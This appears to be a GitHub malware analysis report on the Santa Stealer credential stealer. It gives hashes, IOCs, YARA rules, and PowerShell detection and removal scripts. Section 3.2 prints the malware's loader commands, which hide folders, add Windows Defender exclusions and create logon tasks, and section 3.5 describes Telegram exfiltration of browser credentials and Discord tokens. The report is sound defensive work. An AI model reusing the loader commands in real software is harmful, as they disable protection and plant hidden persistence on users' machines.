GitHub: coddrake/santastealer
A detailed technical analysis report on the Santa Stealer information-stealing malware, including IOCs, YARA detection rules and an automated removal script.
# Malware Analysis Technical Report
## Santa Stealer (Xenostrarperrer.exe)
**Analyst:** coddrake
**Analysis date:** 05/04/2026
**Case ID:** CS-2026-0405-001
**Classification:** Critical
**Status:** Analysis complete
## 1. Executive Summary
| Field | Value |
|-------|-------|
| **Malware name** | Santa Stealer |
| **File name** | Xenostrarperrer.exe |
| **Type** | Trojan stealer |
| **Platform** | Windows (x64) |
| **Family** | SantaStealer |
| **Distribution vector** | Social engineering + Roblox mods distributed via YouTube |
| **C2/Exfiltration** | Telegram Bot API |
**Summary:** Santa Stealer is a modern information stealer that uses obfuscated PowerShell as a loader, disables Windows Defender, harvests browser credentials (Chrome, Opera, Edge) and Discord tokens, and exfiltrates the data through the Telegram Bot API. The identified campaign targets children and teenagers with fake mods for the game Roblox.
## 2. Identification
### 2.1. Hashes
| Algorithm | Hash |
|-----------|------|
| **MD5** | `85a5ac802b4e17e8ea312690ef37e1a7` |
| **SHA1** | `cb0332ba3d9b9ce70d34a1ce5b953ab085bc6bff` |
| **SHA256** | `6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91` |
| **SSDEEP** | `24576:tYZhc8MJsGkP1IHVH2yAJju5zvcokwoPQxMXvocDYvMpVIQJtHLmEQrIVIUxemuG:tYr/q16vybW/oHK` |
### 2.2. PE Signature
| Field | Value |
|-------|-------|
| **Magic Number** | MZ (4D 5A) |
| **Machine Type** | AMD64 (0x8664) |
| **PE Type** | PE32+ (64-bit) |
| **Subsystem** | Windows GUI |
| **Linker Version** | 14.36 |
| **Entry Point** | 0x140001000 |
### 2.3. Executable Sections
| Section | Virtual Address | Virtual Size | Raw Size | Entropy |
|---------|-----------------|--------------|----------|---------|
| `.text` | 0x1000 | 0x17000 | 0x16000 | 6.71 |
| `.data` | 0x18000 | 0x4000 | 0x2000 | 5.23 |
| `.rdata` | 0x1C000 | 0x4000 | 0x3800 | 6.45 |
| `.pdata` | 0x20000 | 0x4000 | 0x3000 | 6.12 |
| `.xdata` | 0x24000 | 0x4000 | 0x2000 | 5.98 |
| `.rsrc` | 0x30000 | 0xE000 | 0xD800 | 7.82 |
| `.reloc` | 0x3E000 | 0x2000 | 0x1800 | 5.67 |
## 3. Behavioural Analysis
### 3.1. Initial Execution
The malware is executed directly by the victim (social engineering). After execution:
1. **Anti-sandbox:** waits 20 seconds before starting any malicious operation
2. **VM check:** tests for a virtual environment via the CPUID instruction
### 3.2. PowerShell Loader
The binary runs an obfuscated PowerShell loader with the following arguments:
```
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [BASE64]
# Create hidden directories
$p1 = "$env:LOCALAPPDATA\Microsoft\Office\Broker"
$p2 = "$env:LOCALAPPDATA\Packages\Microsoft.Windows.PeopleExperienceHost_*\AC\Temp"
# Hide the files/directories
attrib +h +s $p1
attrib +h +s $p2
# Disable Windows Defender for the drop directories
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /reg:64
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v $p1 /t REG_DWORD /d 0 /f /reg:64
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v $p2 /t REG_DWORD /d 0 /f /reg:64
# Persistence via scheduled tasks
schtasks /create /tn "WindowsSystemService" /tr "$p1\svchost.exe" /sc onlogon /rl highest /f
schtasks /create /tn "RuntimeBrokerService" /tr "$p2\RuntimeBroker.exe -Embedding" /sc onlogon /rl highest /f
```
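Added example (my code, not part of the report): a Python triage routine that recovers the script hidden behind a `-WindowStyle Hidden ... -EncodedCommand` launch from a process-creation command line (for instance the CommandLine field of a Sysmon Event ID 1) and scores it against the loader indicators above: the Defender exclusion key, `attrib +h +s`, onlogon scheduled tasks running with highest privileges, and the two task names. The encoded sample is constructed here from the loader lines shown above; the indicator names and the threshold of three hits are my choices, not the report's.

```python
import base64
import re

# Indicators taken from the loader body in section 3.2 of this report.
LOADER_INDICATORS = {
    "defender_exclusion": re.compile(r"Windows Defender\\Exclusions\\Paths", re.I),
    "hidden_attrib": re.compile(r"\battrib\s+\+h\s+\+s\b", re.I),
    "logon_task": re.compile(r"\bschtasks\s+/create\b.*/sc\s+onlogon\b.*/rl\s+highest\b", re.I),
    "task_name": re.compile(r'/tn\s+"?(?:WindowsSystemService|RuntimeBrokerService)"?', re.I),
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-WindowStyle\s+Hidden\b", re.I)


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or malformed."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_process_event(cmdline: str) -> dict:
    """Score one process-creation command line (e.g. Sysmon event 1) against the indicators."""
    decoded = decode_encoded_command(cmdline)
    hits = ["hidden_encoded_powershell"] if decoded is not None and HIDDEN_WINDOW.search(cmdline) else []
    haystack = cmdline + "\n" + (decoded or "")   # indicators may sit in the plain or the decoded part
    hits += [name for name, rx in LOADER_INDICATORS.items() if rx.search(haystack)]
    return {"decoded": decoded, "hits": hits, "suspicious": len(hits) >= 3}   # threshold is my choice


def encode_for_powershell(script: str) -> str:
    """UTF-16LE + base64, the encoding -EncodedCommand expects; used here only to build the fixture."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed fixture: loader lines from section 3.2 as the malware launches them, plus a
# benign encoded command and a plain cmd.exe line for contrast.
LOADER_BODY = (
    '$p1 = "$env:LOCALAPPDATA\\Microsoft\\Office\\Broker"\n'
    "attrib +h +s $p1\n"
    'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths" /v $p1 /t REG_DWORD /d 0 /f /reg:64\n'
    'schtasks /create /tn "WindowsSystemService" /tr "$p1\\svchost.exe" /sc onlogon /rl highest /f\n'
)
SAMPLE_EVENTS = [
    "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand " + encode_for_powershell(LOADER_BODY),
    "powershell.exe -NoProfile -EncodedCommand " + encode_for_powershell("Get-Date"),
    "cmd.exe /c dir",
]
```

Running `analyse_process_event` over the three fixtures flags only the first one, with all five indicators hit; the benign encoded `Get-Date` decodes cleanly but scores zero.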
### 3.3. C2 Communication
```
C2_Domain: bill-proof.cc:443
Protocol: HTTPS
Encryption: AES-256-CBC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0
```
### 3.4. Data Collection
The malware reads the following locations to extract data:
| Target | Path | Data Collected |
|--------|------|----------------|
| Chrome | `%LOCALAPPDATA%\Google\Chrome\User Data\Local State` | DPAPI master key |
| Chrome | `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data` | Credentials |
| Opera | `%APPDATA%\Opera Software\Opera Stable\Local State` | DPAPI key |
| Opera | `%APPDATA%\Opera Software\Opera Stable\Login Data` | Credentials |
| Edge | `%LOCALAPPDATA%\Microsoft\Edge\User Data\Local State` | DPAPI key |
| Discord | `%APPDATA%\Discord\Local Storage\leveldb\*.ldb` | Authentication tokens |
| Desktop | `%USERPROFILE%\Desktop\*.exe, *.dat, *.json` | Crypto wallets |
### 3.5. Exfiltration via Telegram
```
Exfiltration_Method: Telegram Bot API
Endpoint: https://api.telegram.org/bot/sendDocument
Bot_Token: [REDACTED - present in the binary]
Format: Compressed ZIP
Content: Credentials, cookies, tokens, files
```
## 4. Hex and String Analysis
### 4.1. Key Extracted Strings
**Collection paths**
```
C:\Users\%username%\AppData\Local\Google\Chrome\User Data\Local State
%APPDATA%\Opera Software\Opera Stable\Local State
%APPDATA%\Discord\Local Storage\leveldb\*.ldb
```
**Persistence**
```
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths
WindowsSystemService
RuntimeBrokerService
```
**C2 and exfiltration**
```
bill-proof.cc
api.telegram.org
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
```
### 4.2. Identified Hex Patterns
| Offset | Hex Pattern | Meaning |
|--------|-------------|---------|
| `0x00` | `4D 5A 90 00` | MZ Header |
| `0x80` | `50 45 00 00 64 86` | PE Header + Machine x64 |
| `0x1A30` | `FF 15 3A 2C 00 00` | Call CreateFileW |
| `0x1A80` | `FF 15 42 2C 00 00` | Call CryptAcquireContextW |
| `0x29A2C` | `NN NN NN : A A H ...` | Telegram Bot Token |
### 4.3. Imported Functions
| DLL | Function | Purpose |
|-----|----------|---------|
| KERNEL32.dll | CreateFileW, ReadFile, WriteFile | File handling |
| KERNEL32.dll | CreateProcessW, TerminateProcess | Process execution |
| ADVAPI32.dll | RegOpenKeyExW, RegSetValueExW | Registry manipulation |
| CRYPT32.dll | CryptAcquireContextW, CryptDecrypt | DPAPI/AES decryption |
| WINHTTP.dll | WinHttpOpen, WinHttpSendRequest | C2 connection |
## 5. MITRE ATT&CK Mapping
| Tactic | Technique | ID | Observed Implementation |
|--------|-----------|----|-------------------------|
| Initial Access | Phishing via Service | T1566.003 | Fake Roblox mods on YouTube |
| Execution | PowerShell | T1059.001 | Obfuscated loader |
| Execution | Scheduled Task | T1053.005 | WindowsSystemService, RuntimeBrokerService |
| Persistence | Scheduled Task | T1053.005 | Execution at user logon |
| Defense Evasion | Disable Windows Defender | T1562.001 | Registry exclusions |
| Defense Evasion | Hidden Files/Directories | T1564.001 | attrib +h +s |
| Defense Evasion | Obfuscated Files/Info | T1027 | PowerShell encoded command |
| Credential Access | Credentials from Browsers | T1555.003 | Chrome/Opera/Edge Login Data |
| Collection | Data from Local System | T1005 | Files, wallets, tokens |
| Exfiltration | Exfiltration via C2 Channel | T1041 | Telegram Bot API |
| C2 | Encrypted Channel | T1573 | AES-256-CBC + HTTPS |
## 6. Indicators of Compromise (IOCs)
### 6.1. Hashes (Blocklist)
```
iocs:
  hashes:
    md5: 85a5ac802b4e17e8ea312690ef37e1a7
    sha1: cb0332ba3d9b9ce70d34a1ce5b953ab085bc6bff
    sha256: 6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91
```
### 6.2. Network
```
iocs:
  network:
    - domain: bill-proof.cc
      port: 443
      protocol: HTTPS
    - domain: api.telegram.org
      port: 443
      protocol: HTTPS
    - cidr: 149.154.167.0/24
    - cidr: 91.108.56.0/22
```
### 6.3. Files and Directories
```
iocs:
  paths:
    - C:\Users\%username%\AppData\Local\Microsoft\Office\Broker\
    - C:\Users\%username%\AppData\Local\Microsoft\Office\Broker\svchost.exe
    - C:\Users\%username%\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_*\AC\Temp\
    - C:\Users\%username%\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_*\AC\Temp\RuntimeBroker.exe
    - C:\Users\%username%\AppData\Local\Temp\*.zip
```
### 6.4. Registry
```
iocs:
  registry:
    - HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths
    - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```
### 6.5. Scheduled Tasks
```
iocs:
  scheduled_tasks:
    - WindowsSystemService
    - RuntimeBrokerService
```
## 7. YARA Rules
### 7.1. String-based Detection
```
rule SantaStealer_Xenostrarperrer_Strings {
    meta:
        description = "Detects Santa Stealer malware based on extracted strings"
        author = "coddrake"
        date = "2026-04-07"
        hash = "6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91"
    strings:
        $opera = "%APPDATA%\\Opera Software\\Opera Stable" wide ascii
        $defender_excl = "Windows Defender\\Exclusions\\Paths" wide ascii
        $task1 = "WindowsSystemService" ascii
        $task2 = "RuntimeBrokerService" ascii
        $telegram = "api.telegram.org" ascii
        $user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" ascii
    condition:
        uint16(0) == 0x5A4D and 3 of them
}
```
### 7.2. Hex-pattern-based Detection
```
rule SantaStealer_Xenostrarperrer_Hex {
    meta:
        description = "Detects Santa Stealer based on hex patterns"
        author = "coddrake"
        date = "2026-04-07"
    strings:
        $mz = { 4D 5A 90 00 }
        $pe_x64 = { 50 45 00 00 64 86 }
        $createfile = { FF 15 3A 2C 00 00 }
        $crypt_acquire = { FF 15 42 2C 00 00 }
    condition:
        $mz at 0 and $pe_x64 at 0x80 and all of them
}
```
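Added example (my code, not the report's): the PE-header and entropy checks behind sections 2.2, 2.3 and rule 7.2, in Python. Rule 7.2 pins the PE signature at offset 0x80, which holds for this sample; the parser below instead follows `e_lfanew` at offset 0x3C, the way the Windows loader does, so it also handles binaries whose DOS stub has a different size. The entropy function reproduces the per-section measure from section 2.3 (values near 8 bits/byte, like `.rsrc` at 7.82, point at compressed or encrypted content). The header bytes are a constructed fixture, not the sample's bytes.

```python
import math
import struct

IMAGE_FILE_MACHINE_AMD64 = 0x8664   # "Machine Type" in section 2.2
PE32_PLUS_MAGIC = 0x20B             # optional-header magic for PE32+


def parse_pe_header(data: bytes) -> dict:
    """Locate the PE header through e_lfanew (offset 0x3C) rather than assuming it sits at 0x80."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew=0x%X" % e_lfanew)
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]   # optional header follows the 20-byte file header
    return {"e_lfanew": e_lfanew, "machine": machine, "sections": nsections,
            "x64": machine == IMAGE_FILE_MACHINE_AMD64, "pe32plus": magic == PE32_PLUS_MAGIC}


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte, 0..8; compressed or encrypted data approaches 8 (cf. .rsrc at 7.82 in section 2.3)."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_stub(e_lfanew: int, machine: int = IMAGE_FILE_MACHINE_AMD64) -> bytes:
    """Constructed fixture: MZ header, PE signature, 20-byte file header with 7 sections, PE32+ magic."""
    dos = bytearray(e_lfanew)
    dos[:4] = b"MZ\x90\x00"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", machine, 7, 0, 0, 0, 0xF0, 0x22)
    return bytes(dos) + b"PE\x00\x00" + file_hdr + struct.pack("<H", PE32_PLUS_MAGIC)


def rule_7_2_header_check(data: bytes) -> bool:
    """The header half of YARA rule 7.2: MZ at 0 and PE signature + machine 0x8664 hard-wired at 0x80."""
    return data[:4] == b"MZ\x90\x00" and data[0x80:0x86] == b"PE\x00\x00\x64\x86"
```

With a DOS stub of a different length the hard-wired check misses while the `e_lfanew` parser still finds the header, which is why the `$pe_x64 at 0x80` clause should be read as tied to this sample rather than as a generic x64 test.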
## 8. Detection Script (PowerShell)
```
<#
.SYNOPSIS
    Detects Santa Stealer indicators on the system
.NOTES
    Author: coddrake
    Date:   2026-04-07
#>
param(
    [string]$ComputerName = "localhost"
)

Write-Host "[*] Santa Stealer Detection Script" -ForegroundColor Cyan
Write-Host "[*] Author: coddrake" -ForegroundColor Cyan
Write-Host "[*] Date: 2026-04-07" -ForegroundColor Cyan
Write-Host ""

$detections = @()

# 1. Check known hashes (section 6.1). Hashing every file on C:\ is slow; narrow -Path
#    to the user profile if a quicker triage is enough.
$knownHashes = @(
    "85a5ac802b4e17e8ea312690ef37e1a7",                                  # MD5
    "6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91"   # SHA256
)
Write-Host "[*] Verificando hashes conhecidos..." -ForegroundColor Yellow
# -File keeps directories out (Get-FileHash cannot hash them); both algorithms are
# computed so that the MD5 entry in $knownHashes can actually match.
$files = Get-ChildItem -Path C:\ -File -Recurse -ErrorAction SilentlyContinue
foreach ($file in $files) {
    try {
        foreach ($algo in @("MD5", "SHA256")) {
            $hash = Get-FileHash -Path $file.FullName -Algorithm $algo -ErrorAction Stop
            if ($knownHashes -contains $hash.Hash) {
                $detections += "[!] ARQUIVO MALICIOSO: $($file.FullName)"
                Write-Host "[!] ARQUIVO MALICIOSO: $($file.FullName)" -ForegroundColor Red
                break
            }
        }
    }
    catch {}
}

# 2. Check scheduled tasks (section 6.5)
Write-Host "[*] Verificando tarefas agendadas..." -ForegroundColor Yellow
$suspiciousTasks = @("WindowsSystemService", "RuntimeBrokerService")
foreach ($task in $suspiciousTasks) {
    $exists = schtasks /query /tn $task 2>$null
    if ($exists) {
        $detections += "[!] TAREFA SUSPEITA: $task"
        Write-Host "[!] TAREFA SUSPEITA: $task" -ForegroundColor Red
    }
}

# 3. Check Windows Defender exclusions
Write-Host "[*] Verificando exclusões do Windows Defender..." -ForegroundColor Yellow
$exclusions = Get-MpPreference -ErrorAction SilentlyContinue | Select-Object -ExpandProperty ExclusionPath
foreach ($excl in $exclusions) {
    if ($excl -match "Broker|PeopleExperience") {
        $detections += "[!] EXCLUSÃO SUSPEITA: $excl"
        Write-Host "[!] EXCLUSÃO SUSPEITA: $excl" -ForegroundColor Red
    }
}

# 4. Check suspicious folders (section 6.3)
Write-Host "[*] Verificando pastas suspeitas..." -ForegroundColor Yellow
$suspiciousPaths = @(
    "$env:LOCALAPPDATA\Microsoft\Office\Broker",
    "$env:LOCALAPPDATA\Packages\*PeopleExperienceHost*\AC\Temp"
)
foreach ($path in $suspiciousPaths) {
    $resolved = Resolve-Path $path -ErrorAction SilentlyContinue
    if ($resolved) {
        $detections += "[!] PASTA SUSPEITA: $resolved"
        Write-Host "[!] PASTA SUSPEITA: $resolved" -ForegroundColor Red
    }
}

# 5. Check connections to Telegram (address ranges from section 6.2; dots escaped
#    because Select-String -Pattern is a regex)
Write-Host "[*] Verificando conexões com Telegram..." -ForegroundColor Yellow
$telegramIPs = @("149\.154\.167\.", "91\.108\.56\.")
$connections = netstat -ano | Select-String -Pattern $telegramIPs
if ($connections) {
    $detections += "[!] CONEXÃO COM TELEGRAM DETECTADA"
    Write-Host "[!] CONEXÃO COM TELEGRAM DETECTADA" -ForegroundColor Red
    $connections | ForEach-Object { Write-Host "    $_" -ForegroundColor Yellow }
}

# Final report
Write-Host ""
Write-Host "========================================" -ForegroundColor Cyan
Write-Host "[*] RELATÓRIO DE DETECÇÃO" -ForegroundColor Cyan
Write-Host "========================================" -ForegroundColor Cyan
if ($detections.Count -eq 0) {
    Write-Host "[+] Nenhum indicador encontrado." -ForegroundColor Green
} else {
    Write-Host "[-] $($detections.Count) indicador(es) encontrado(s):" -ForegroundColor Red
    $detections | ForEach-Object { Write-Host "    $_" -ForegroundColor Red }
}
Write-Host ""
Write-Host "[*] Fim da análise." -ForegroundColor Cyan
```
## 9. Removal Script
```
<#
.SYNOPSIS
    Removes Santa Stealer from the infected system
.NOTES
    Author: coddrake
    Date:   2026-04-07
    Run as Administrator
#>
Write-Host "[*] Iniciando remediação do Santa Stealer" -ForegroundColor Cyan
Write-Host "[*] Author: coddrake" -ForegroundColor Cyan

# 1. Kill malicious processes. Get-Process -Name takes the image name without ".exe",
#    and the filter keys on the drop directories from section 6.3, so the legitimate
#    svchost.exe / RuntimeBroker.exe under C:\Windows (whose name also contains
#    "Broker") are left alone.
Write-Host "[*] Matando processos maliciosos..." -ForegroundColor Yellow
$maliciousProcesses = @("svchost", "RuntimeBroker")
$dropDirs = '\\Microsoft\\Office\\Broker(\\|$)|\\PeopleExperienceHost_[^\\]*\\AC\\Temp(\\|$)'
foreach ($proc in $maliciousProcesses) {
    Get-Process -Name $proc -ErrorAction SilentlyContinue | Where-Object {
        $_.Path -match $dropDirs
    } | Stop-Process -Force -ErrorAction SilentlyContinue
}
Write-Host "[+] Processos finalizados" -ForegroundColor Green

# 2. Delete scheduled tasks
Write-Host "[*] Removendo tarefas agendadas..." -ForegroundColor Yellow
schtasks /delete /tn "WindowsSystemService" /f 2>$null
schtasks /delete /tn "RuntimeBrokerService" /f 2>$null
Write-Host "[+] Tarefas removidas" -ForegroundColor Green

# 3. Remove Windows Defender exclusions. The loader writes them under
#    HKLM\SOFTWARE\Policies (section 6.4), which is policy scope; Remove-MpPreference
#    only manages local preferences, so verify that registry key as well.
Write-Host "[*] Removendo exclusões do Windows Defender..." -ForegroundColor Yellow
$exclusions = Get-MpPreference -ErrorAction SilentlyContinue | Select-Object -ExpandProperty ExclusionPath
foreach ($excl in $exclusions) {
    if ($excl -match $dropDirs) {
        Remove-MpPreference -ExclusionPath $excl -ErrorAction SilentlyContinue
        Write-Host "[+] Exclusão removida: $excl" -ForegroundColor Green
    }
}

# 4. Remove malicious files
Write-Host "[*] Removendo arquivos maliciosos..." -ForegroundColor Yellow
$paths = @(
    "$env:LOCALAPPDATA\Microsoft\Office\Broker",
    "$env:LOCALAPPDATA\Packages\*PeopleExperienceHost*\AC\Temp"
)
foreach ($path in $paths) {
    if (Test-Path $path) {
        Remove-Item $path -Recurse -Force -ErrorAction SilentlyContinue
        Write-Host "[+] Removido: $path" -ForegroundColor Green
    }
}

# 5. Restore the PowerShell execution policy
Write-Host "[*] Restaurando política de execução..." -ForegroundColor Yellow
Set-ExecutionPolicy Restricted -Scope LocalMachine -Force -ErrorAction SilentlyContinue
Write-Host "[+] Política restaurada" -ForegroundColor Green

# 6. Force a Windows Defender signature update
Write-Host "[*] Atualizando Windows Defender..." -ForegroundColor Yellow
Update-MpSignature -ErrorAction SilentlyContinue
Write-Host "[+] Defender atualizado" -ForegroundColor Green

Write-Host ""
Write-Host "[*] REMEDIAÇÃO CONCLUÍDA" -ForegroundColor Green
Write-Host "[*] Recomenda-se reiniciar o sistema" -ForegroundColor Yellow
```
## 10. Conclusions and Recommendations
### 10.1. Conclusions
| Field | Value |
|-------|-------|
| **Confirmed malware** | Santa Stealer (Xenostrarperrer.exe) |
| **Capabilities** | Credential stealer, persistence, defense evasion |
| **Primary target** | Children and teenagers (Roblox players) |
| **Distribution vector** | YouTube + Roblox mods |
| **C2 infrastructure** | bill-proof.cc + Telegram API |
### 10.2. Recommendations for Organisations
1. Block the IOCs on firewalls, proxies and antivirus
2. Block api.telegram.org at the network level (if it is not used internally)
3. Restrict PowerShell for non-administrator users
4. Deploy AppLocker to block execution from %APPDATA% and %TEMP%
5. Monitor scheduled task creation through the SIEM
6. Educate users (especially parents and teenagers) about the risks of unofficial downloads
### 10.3. Recommendations for End Users
1. Never download files from YouTube links
2. Be wary of lures such as "free Robux", "mods" and "cheats"
3. Keep Windows Defender enabled and up to date
4. Enable parental controls on the computer
5. Change passwords if an infection is suspected
## 11. Appendix
### 11.1. Technical References
1. MITRE ATT&CK: https://attack.mitre.org
2. NIST SP 800-83: Malware Incident Response Guide
3. ISO/IEC 27001:2022 A.8.7: Protection against malware
**Signed:** coddrake, Malware Analyst, 2026-04-07